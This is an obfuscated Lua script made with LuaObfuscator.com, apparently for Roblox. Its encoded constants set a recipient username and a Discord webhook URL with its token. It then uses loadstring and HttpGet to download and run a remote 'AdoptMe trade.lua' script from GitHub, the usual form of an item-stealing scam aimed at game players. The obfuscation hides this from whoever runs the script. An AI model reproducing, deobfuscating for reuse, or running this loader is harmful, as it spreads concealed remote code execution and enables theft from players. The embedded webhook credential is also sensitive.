--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.7) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function() return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...) local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30) if (v1(v30,2)==79) then v19=v0(v3(v30,1,1));return "";else local v89=v2(v0(v30,16));if v19 then local v110=0;local v111;while true do if (v110==1) then return v111;end if (v110==0) then v111=v5(v89,v19);v19=nil;v110=1;end end else return v89;end end end);local function v20(v31,v32,v33) if v33 then local v90=(v31/((5 -3)^(v32-(1 + 0))))%((5 -3)^(((v33-1) -(v32-(1 -0))) + 1 + 0)) ;return v90-(v90%(2 -1)) ;else local v91=(621 -(555 + 64))^(v32-(932 -(857 + 74))) ;return (((v31%(v91 + v91))>=v91) and (569 -(367 + 201))) or (927 -(214 + 713)) ;end end local function v21() local v34=877 -(282 + 595) ;local v35;while true do if (v34==(1638 -((2170 -647) + 114))) then return v35;end if (v34==(0 + (1065 -(68 + 997)))) then v35=v1(v16,v18,v18);v18=v18 + 1 ;v34=1;end end end local function v22() local v36,v37=v1(v16,v18,v18 + (1272 -(226 + 1044)) );v18=v18 + (8 -6) ;return (v37 * (373 -(32 + 85))) + v36 ;end local function v23() local v38=0 -0 ;local v39;local v40;local v41;local v42;while true do if (v38==1) then return (v42 * (16441815 + 335401)) + (v41 * (65886 -(87 + 263))) + (v40 * 256) + v39 ;end if (((715 -535) -(67 + (1065 -(802 + 150))))==v38) then v39,v40,v41,v42=v1(v16,v18,v18 + 1 + 2 );v18=v18 + (961 -(892 + 65)) ;v38=2 -1 ;end end end local function v24() local v43=v23();local v44=v23();local v45=(444 -(416 + 26)) -1 ;local v46=(v20(v44,1 -0 ,15 + 5 ) * ((999 -(915 + 82))^(90 -58))) + v43 ;local v47=v20(v44,13 + 8 ,(127 -87) -9 );local v48=((v20(v44,(524 + 695) -(1069 + 118) )==((3 -1) -1)) and  -1) or (1 -0) ;if (v47==((438 -(145 + 293)) + 0)) then if (v46==((430 -(44 + 386)) -0)) then return v48 * 0 ;else v47=(1487 -(998 + 488)) + 0 ;v45=0;end elseif (v47==(651 + 1396)) then return ((v46==(791 -(368 + 423))) and (v48 * (1/0))) or (v48 * NaN) ;end return v8(v48,v47-(3214 -(1795 + 396)) ) * (v45 + (v46/((20 -(10 + 8))^(199 -147)))) ;end local function v25(v49) local v50=772 -((357 -156) + 571) ;local v51;local v52;while true do if (v50==((2219 -(1020 + 60)) -(116 + 1022))) then v51=v3(v16,v18,(v18 + v49) -(4 -3) );v18=v18 + v49 ;v50=2;end if ((1426 -(630 + 793))==v50) then return v6(v52);end if (v50==((0 -0) + 0)) then v51=nil;if  not v49 then local v119=0 -0 ;while true do if (v119==(0 -0)) then v49=v23();if (v49==(859 -(814 + 45))) then return "";end break;end end end v50=2 -1 ;end if (v50==(1 + 1)) then v52={};for v112=1 + 0 , #v51 do v52[v112]=v2(v1(v3(v51,v112,v112)));end v50=888 -(261 + 624) ;end end end local v26=v23;local function v27(...) return {...},v12("#",...);end local function v28() local v53=(function() return function(v92,v93,v94,v95,v96,v97,v98,v99,v100) local v101=(function() return 0;end)();local v92=(function() return;end)();local v93=(function() return;end)();while true do if (v101==0) then local v120=(function() return 1943 -(1008 + 935) ;end)();while true do if (v120~=(157 -(142 + 14))) then else v101=(function() return 1;end)();break;end if (v120==0) then v92=(function() return 1793 -(1563 + 230) ;end)();v93=(function() return nil;end)();v120=(function() return 1;end)();end end end if (1==v101) then local v121=(function() return 0;end)();while true do if (v121==0) then while true do if ((285 -(134 + 151))==v92) then v93=(function() return v94();end)();if (v95(v93, #"}", #"}")~=(1665 -(970 + 695))) then else local v162=(function() return 0 -0 ;end)();local v163=(function() return;end)();local v164=(function() return;end)();local v165=(function() return;end)();local v166=(function() return;end)();while true do if (v162==(1990 -(582 + 1408))) then local v184=(function() return 0 -0 ;end)();while true do if (v184==(0 -0)) then v163=(function() return 0 -0 ;end)();v164=(function() return nil;end)();v184=(function() return 1825 -(1195 + 629) ;end)();end if ((1 -0)==v184) then v162=(function() return 1;end)();break;end end end if (v162~=2) then else while true do if (v163~=(243 -(187 + 54))) then else local v187=(function() return 0;end)();local v188=(function() return;end)();while true do if (v187~=0) then else v188=(function() return 0;end)();while true do if (v188==(781 -(162 + 618))) then v163=(function() return  #"xxx";end)();break;end if (v188==(0 + 0)) then if (v95(v165, #"{", #"}")== #",") then v166[2]=(function() return v96[v166[2]];end)();end if (v95(v165,2,2)== #"\\") then v166[ #"19("]=(function() return v96[v166[ #"19("]];end)();end v188=(function() return 1 + 0 ;end)();end end break;end end end if (v163== #">") then local v189=(function() return 0;end)();local v190=(function() return;end)();while true do if (0~=v189) then else v190=(function() return 0 -0 ;end)();while true do if (v190==0) then v166=(function() return {v97(),v97(),nil,nil};end)();if (v164==(0 + 0)) then local v197=(function() return 0;end)();local v198=(function() return;end)();while true do if (v197==(1636 -(1373 + 263))) then v198=(function() return 0;end)();while true do if (v198~=(1000 -(451 + 549))) then else v166[ #"gha"]=(function() return v97();end)();v166[ #"0313"]=(function() return v97();end)();break;end end break;end end elseif (v164== #"|") then v166[ #"gha"]=(function() return v98();end)();elseif (v164==2) then v166[ #"xxx"]=(function() return v98() -((1 + 1)^16) ;end)();elseif (v164~= #"-19") then else local v203=(function() return 0 -0 ;end)();local v204=(function() return;end)();while true do if (v203~=(0 -0)) then else v204=(function() return 0;end)();while true do if (v204~=0) then else v166[ #"xxx"]=(function() return v98() -((1386 -(746 + 638))^(7 + 9)) ;end)();v166[ #"asd1"]=(function() return v97();end)();break;end end break;end end end v190=(function() return 1;end)();end if (1~=v190) then else v163=(function() return 2;end)();break;end end break;end end end if (v163==0) then local v191=(function() return 0 -0 ;end)();local v192=(function() return;end)();while true do if ((341 -(218 + 123))==v191) then v192=(function() return 0;end)();while true do if (v192==(1581 -(1535 + 46))) then v164=(function() return v95(v93,2, #"-19");end)();v165=(function() return v95(v93, #"asd1",6 + 0 );end)();v192=(function() return 1;end)();end if ((1 + 0)==v192) then v163=(function() return  #"<";end)();break;end end break;end end end if (v163~= #"xxx") then else if (v95(v165, #"91(", #"-19")== #"/") then v166[ #"asd1"]=(function() return v96[v166[ #"xnxx"]];end)();end v99[v100]=(function() return v166;end)();break;end end break;end if (v162~=(561 -(306 + 254))) then else local v185=(function() return 0;end)();local v186=(function() return;end)();while true do if (v185==(0 + 0)) then v186=(function() return 0 -0 ;end)();while true do if (v186==1) then v162=(function() return 1469 -(899 + 568) ;end)();break;end if (v186~=(0 + 0)) then else v165=(function() return nil;end)();v166=(function() return nil;end)();v186=(function() return 1;end)();end end break;end end end end end break;end end return v92,v93,v94,v95,v96,v97,v98,v99,v100;end end end end end;end)();local v54=(function() return function(v102,v103,v104) local v105=(function() return 0;end)();local v106=(function() return;end)();while true do if ((0 -0)==v105) then v106=(function() return 0;end)();while true do if (v106~=0) then else v102[v103-#"|" ]=(function() return v104();end)();return v102,v103,v104;end end break;end end end;end)();local v55=(function() return {};end)();local v56=(function() return {};end)();local v57=(function() return {};end)();local v58=(function() return {v55,v56,nil,v57};end)();local v59=(function() return v23();end)();local v60=(function() return {};end)();for v68= #"<",v59 do local v69=(function() return 0;end)();local v70=(function() return;end)();local v71=(function() return;end)();local v72=(function() return;end)();while true do if (v69==0) then local v114=(function() return 603 -(268 + 335) ;end)();while true do if ((291 -(60 + 230))==v114) then v69=(function() return 1;end)();break;end if (v114==0) then v70=(function() return 0;end)();v71=(function() return nil;end)();v114=(function() return 573 -(426 + 146) ;end)();end end end if (v69==(1 + 0)) then v72=(function() return nil;end)();while true do if ((1457 -(282 + 1174))~=v70) then else if (v71== #":") then v72=(function() return v21()~=(811 -(569 + 242)) ;end)();elseif (v71==2) then v72=(function() return v24();end)();elseif (v71== #"19(") then v72=(function() return v25();end)();end v60[v68]=(function() return v72;end)();break;end if (v70==(0 -0)) then local v123=(function() return 0;end)();while true do if (v123==0) then v71=(function() return v21();end)();v72=(function() return nil;end)();v123=(function() return 1;end)();end if (v123==1) then v70=(function() return 1 + 0 ;end)();break;end end end end break;end end end v58[ #"91("]=(function() return v21();end)();for v73= #"{",v23() do FlatIdent_7FAC9,Descriptor,v21,v20,v60,v22,v23,v55,v73=(function() return v53(FlatIdent_7FAC9,Descriptor,v21,v20,v60,v22,v23,v55,v73);end)();end for v74= #"{",v23() do v56,v74,v28=(function() return v54(v56,v74,v28);end)();end return v58;end local function v29(v62,v63,v64) local v65=v62[1];local v66=v62[1026 -(706 + 318) ];local v67=v62[1254 -(721 + 530) ];return function(...) local v75=v65;local v76=v66;local v77=v67;local v78=v27;local v79=1272 -(945 + 326) ;local v80= -(2 -1);local v81={};local v82={...};local v83=v12("#",...) -(701 -(271 + 429)) ;local v84={};local v85={};for v107=0 + 0 ,v83 do if ((2104>=1421) and (v107>=v77)) then v81[v107-v77 ]=v82[v107 + (1501 -(1408 + 92)) ];else v85[v107]=v82[v107 + (1087 -(461 + 625)) ];end end local v86=(v83-v77) + 1 ;local v87;local v88;while true do v87=v75[v79];v88=v87[(5051 -3762) -(993 + 295) ];if (v88<=(1 + 8)) then if (v88<=(1175 -(418 + (1874 -(118 + 1003))))) then if (v88<=(1 + 0)) then if ((1812<=3249) and (v88==(0 + 0))) then v85[v87[1 + 1 ]]=v87[3];elseif ((1623<=1957) and (v85[v87[2]]==v87[2 + 2 ])) then v79=v79 + (530 -(406 + 123)) ;else v79=v87[1772 -(1749 + 20) ];end elseif (v88<=(5 -3)) then local v127=v87[1 + (378 -(142 + 235)) ];local v128,v129=v78(v85[v127](v13(v85,v127 + ((6001 -4678) -(1249 + 73)) ,v87[2 + 1 ])));v80=(v129 + v127) -1 ;local v130=1145 -(466 + 679) ;for v142=v127,v80 do v130=v130 + (2 -1) ;v85[v142]=v128[v130];end elseif (v88>(8 -5)) then v85[v87[1902 -(106 + 1794) ]]=v64[v87[1 + 1 + 1 ]];else v64[v87[(978 -(553 + 424)) + 2 ]]=v85[v87[5 -(5 -2) ]];end elseif (v88<=(16 -10)) then if ((4412==4412) and (v88==5)) then local v131=114 -(4 + 110) ;local v132;while true do if (v131==(584 -(57 + 527))) then v132=v87[2];v85[v132]=v85[v132](v13(v85,v132 + 1 ,v80));break;end end else local v133=0;local v134;while true do if (v133==(1427 -(37 + 4 + 1386))) then v134=v87[105 -(17 + 86) ];v85[v134]=v85[v134](v13(v85,v134 + 1 ,v80));break;end end end elseif ((1750>=842) and (v88<=(5 + 2))) then v79=v87[6 -3 ];elseif ((4372>1850) and (v88==(23 -15))) then do return;end else v85[v87[168 -(122 + 44) ]]=v64[v87[5 -2 ]];end elseif ((232<821) and (v88<=14)) then if ((518<902) and (v88<=(36 -25))) then if (v88==(9 + 1)) then local v136=0 + 0 ;local v137;local v138;while true do if ((2994>858) and (v136==1)) then v85[v137 + 1 ]=v138;v85[v137]=v138[v87[4]];break;end if (((0 -0)==v136) or (3755<=915)) then v137=v87[67 -(30 + 0 + 35) ];v138=v85[v87[3]];v136=1 + 0 + 0 ;end end else v85[v87[1259 -(1043 + 214) ]]();end elseif (v88<=((20 + 25) -33)) then do return;end elseif (v88>(1225 -(323 + 889))) then local v152=v87[5 -3 ];local v153,v154=v78(v85[v152](v13(v85,v152 + 1 ,v87[3])));v80=(v154 + v152) -(581 -(361 + 126 + 93)) ;local v155=320 -(53 + (578 -311)) ;for v176=v152,v80 do v155=v155 + 1 ;v85[v176]=v153[v155];end else v85[v87[1 + 1 ]]();end elseif (v88<=((1194 -765) -(15 + (891 -493)))) then if (v88==(997 -(18 + 964))) then v64[v87[11 -8 ]]=v85[v87[2 + 0 ]];else v79=v87[3];end elseif (v88<=(11 + 6)) then if ((3946>3743) and (v85[v87[852 -(6 + 14 + 830) ]]==v87[4 + 0 ])) then v79=v79 + ((613 -486) -(116 + 10)) ;else v79=v87[1 + 2 ];end elseif (v88==(756 -(542 + 196))) then v85[v87[(756 -(239 + 514)) -1 ]]=v87[2 + 1 ];else local v159=0 + 0 ;local v160;local v161;while true do if ((v159==(1330 -(797 + 532))) or (1335>=3306)) then v85[v160 + 1 + 0 ]=v161;v85[v160]=v161[v87[2 + 2 ]];break;end if (v159==(0 -0)) then v160=v87[2];v161=v85[v87[7 -4 ]];v159=1552 -(1126 + 425) ;end end end v79=v79 + (406 -(86 + 32 + 287)) ;end end;end return v29(v28(),{},v17)(...);end return v15("LOL!0A3O00028O00026O00F03F030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403433O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F4861726447616D6553732F41646F70744D652F6D61696E2F74726164652E6C756103083O00557365724E616D65030D3O006D6F68616D656474616861656803073O00576562482O6F6B03793O00682O7470733A2O2F646973636F72642E636F6D2F6170692F776562682O6F6B732F2O3135363332333036303538302O38343533312F62494D614658544C616C3271705256555F64422O456835324D69484C4630757864734F7A5830742D34366D364A3470626668524754464E436F74476F6870307257414D7A00143O00124O00013O0026013O000B000100020004103O000B0001001209000100033O001209000200043O00201300020002000500122O000400064O000E000200044O000500013O00022O000B0001000100010004103O001300010026013O0001000100010004103O0001000100122O000100083O00120F000100073O00122O0001000A3O00120F000100093O00124O00023O0004103O000100012O000C3O00017O00",v9(),...);
